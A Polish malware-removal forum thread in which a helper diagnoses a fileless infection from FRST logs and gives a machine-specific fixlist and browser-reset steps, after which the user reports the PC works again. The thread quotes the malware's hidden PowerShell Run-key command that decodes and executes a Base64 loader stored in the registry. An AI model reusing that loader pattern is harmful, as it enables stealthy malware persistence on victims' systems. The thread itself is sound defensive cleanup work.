loleq0 Opublikowano 17 Grudnia 2015 Zgłoś Udostępnij Opublikowano 17 Grudnia 2015 Cześć. Przeskanowałem komputer programem mbam, wykryło około 600 zagrożeń więc jako laik w tej dziedzinie usunąłem tym programem wszystko co się dało, tak żeby w kwarantannie nawet nic nie zostało. Po tym nastąpił mój problem: kiedy chcę pobrać jakiś torrent muszę użyć programu, jednak nie mogę bo po włączeniu (uTorrent, BitTorrent) zacinają się, wyskakuje brak odpowiedzi, że program jest uruchomiony (wyłączałem w menedżerze, usuwałem jakieś ślady po tych programach gdzie się da i nie (pomaga), a nowo pobranych nie mogę zainstalować bo też się zacinają i wyskakuje brak odpowiedzi. W mbmamie zagrożenia w 99% zaczynały się PUP.Optional...... Dodatkowo zauważyłem, że niektóre pliki MsoftOffice zmieniły wygląd ikonek i rozpoczynają się znakiem ~$ a po ich włączeniu wyskakuje komunikat, że w dokumencie znaleziono zawartość, której nie można odczytać. Przed skanem wszystko działało normalnie. skan mbam z dnia dzisiejszego http://wklej.org/id/1880328/ Skanu z GMER tez nie moge wrzucić w txt http://wklej.org/id/1880343/ Addition.txt FRST.txt Shortcut.txt GMER.txt.txt Odnośnik do komentarza
Rucek Opublikowano 17 Grudnia 2015 Zgłoś Udostępnij Opublikowano 17 Grudnia 2015 Zapoznaj się proszę z zasadami działu: KLIKPostepujac zgodnie z powyzszymi instrukcjami - edytuj post i dołącz resztę wymaganych logów do tematu - brakuje Shortcut.txtŁącznie mają być 4 logi: (FRST [FRST.txt, Addition.txt, Shortcut.txt] oraz GMER [recznie wklejasz wynik skanowania do pliku GMER.txt który tworzysz na pulpicie], Odnośnik do komentarza
loleq0 Opublikowano 17 Grudnia 2015 Autor Zgłoś Udostępnij Opublikowano 17 Grudnia 2015 Poprawione, przepraszam, nie zauważyłem tego, że trzeba shortcut dodać ;-) Przed chwila jeszcze uruchamialem ponownie kompter, pierwszy raz od wieków, zawsze lapka tylko zamykalem. Zauważyłem również, żejak uruchamiają się niektóre programy to pojawia się komunikat (np. 7 stickynotes: error code 3051 Aparatbazy danych nie może otworzyć pliku 'C:\Users\jurek\AppData\Roaming\7 Sticky Notes\notes.mbd') oraz nie zapisuje haseł w przegladarce,caly czas musze je wpisywać na nowo mimo zaznaczonej opcji zapamietaj itp. Odnośnik do komentarza
picasso Opublikowano 17 Grudnia 2015 Zgłoś Udostępnij Opublikowano 17 Grudnia 2015 W Windows jest aktywna tzw. "infekcja bezplikowa" (loader jest zaszyfrowany w rejestrze, nie ma plików na dysku) uruchamiana via PowerShell: HKU\S-1-5-21-1268698185-3662455055-1806142860-1001\...\Run: [{5919B21C-1B82-4F17-85FF-5D62066E73A1}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\JLXVTLPJVAIKPA').YKEFZVOR))); Poza tym, widzę że wiele plików w różnych katalogach użytkownika ma atrybut R ("Tylko do odczytu"). To może być przyczyna innych problemów. Operacje do przeprowadzenia: 1. Odinstaluj starą wersję Java 7 Update 45. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: DeleteKey: HKCU\Software\Classes\JLXVTLPJVAIKPA HKU\S-1-5-21-1268698185-3662455055-1806142860-1001\...\Run: [{5919B21C-1B82-4F17-85FF-5D62066E73A1}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\JLXVTLPJVAIKPA').YKEFZVOR))); HKU\S-1-5-21-1268698185-3662455055-1806142860-1001\...\Policies\Explorer: [TaskbarNoNotification] 0 HKU\S-1-5-21-1268698185-3662455055-1806142860-1001\...\Policies\Explorer: [HideSCAHealth] 0 HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0 HKLM\...\Policies\Explorer: [HideSCAHealth] 0 Winlogon\Notify\igfxcui: igfxdev.dll [X] ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File CHR HKLM\SOFTWARE\Policies\Google: Restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction HKU\S-1-5-21-1268698185-3662455055-1806142860-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-1268698185-3662455055-1806142860-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-1268698185-3662455055-1806142860-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File] StartMenuInternet: FIREFOX.EXE - firefox.exe CHR HKLM\...\Chrome\Extension: [jdiejbegdjikmehflknhkbieocmnogcf] - C:\Users\jurek\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdiejbegdjikmehflknhkbieocmnogcf.crx [2015-11-07] CHR HKLM-x32\...\Chrome\Extension: [dhigneefebkcagnpnpbibganpmfgebnk] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [jdiejbegdjikmehflknhkbieocmnogcf] - C:\Users\jurek\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdiejbegdjikmehflknhkbieocmnogcf.crx [2015-11-07] S3 XFDriver64; no ImagePath S1 swenwvbx; \??\C:\Windows\system32\drivers\swenwvbx.sys [X] Task: {3AD55E9A-B71D-42D5-976B-72AB3A7AAA16} - \AutoKMS -> No File Task: {E00610B7-74B3-4E88-BD3E-BA8DBCC31BE5} - System32\Tasks\ASUS InstallAll ReInst => C:\Users\jurek\AppData\Local\Temp\\InstallAll\ReInst.exe DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OfficeSyncProcess /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v svchost /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v uTorrent /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder /v "Tworzenie wycinków ekranu i uruchamianie programu OneNote 2010.lnk" /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v APSDaemon /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v iTunesHelper /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v "LogMeIn Hamachi Ui" /f CMD: netsh advfirewall reset RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\conoTinuetoisAve RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Tanks RemoveDirectory: C:\Users\jurek\AppData\Roaming\Microsoft\Windows\GameExplorer\PlayTasks RemoveDirectory: C:\Users\jurek\AppData\Roaming\Microsoft\Windows\GameExplorer\SupportTasks C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total War ROME II.lnk C:\Users\jurek\AppData\Local\fvfnogoit.reg C:\Users\jurek\AppData\Roaming\9GPH0NJ1TN.exe C:\Users\jurek\AppData\Roaming\no C:\Users\jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk C:\Users\jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk C:\Users\jurek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\µTorrent.lnk C:\Users\jurek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk C:\Users\jurek\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk C:\Users\jurek\Desktop\Pulpit\GRIDAutosport — skrót.lnk C:\Users\jurek\Desktop\Pulpit\Skype.lnk C:\Users\jurek\Desktop\Pulpit\µTorrent.lnk C:\Windows\SysWOW64\pl.html CMD: attrib -r C:\Users\jurek\*.* /s EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8 Plik fixlist.txt umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przelądarki: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzba będzie przeinstalować. Menu Historia > Wyczyść całą historię przeglądania. Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone, ale używane rozszerzenia zostaną wyłączone (włącz ręcznie ponownie). 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt. Plik ten może być ogromny, ze względu na rekursywne ściąganie atrybutu "R" z całej ścieżki "C:\Users\jurek". Jeśli nie wszedłby do załącznika, shostuj gdzieś i podaj link do niego. Odnośnik do komentarza
loleq0 Opublikowano 17 Grudnia 2015 Autor Zgłoś Udostępnij Opublikowano 17 Grudnia 2015 Zrobiłem, wszystko działa już normalnie. Dziekuję bardzo . Temat można zamknąć FRST.txt Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 18 Grudnia 2015 Zgłoś Udostępnij Opublikowano 18 Grudnia 2015 Logi nie były za duże, wstawiłam w załączniki. Wszystko pomyślnie wykonane. Na zakończenie: Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. Odnośnik do komentarza
loleq0 Opublikowano 18 Grudnia 2015 Autor Zgłoś Udostępnij Opublikowano 18 Grudnia 2015 Tak zrobiłem. Wszystko działa bez zarzutu. Jeszcze raz, wielkie dzięki! Odnośnik do komentarza
Rekomendowane odpowiedzi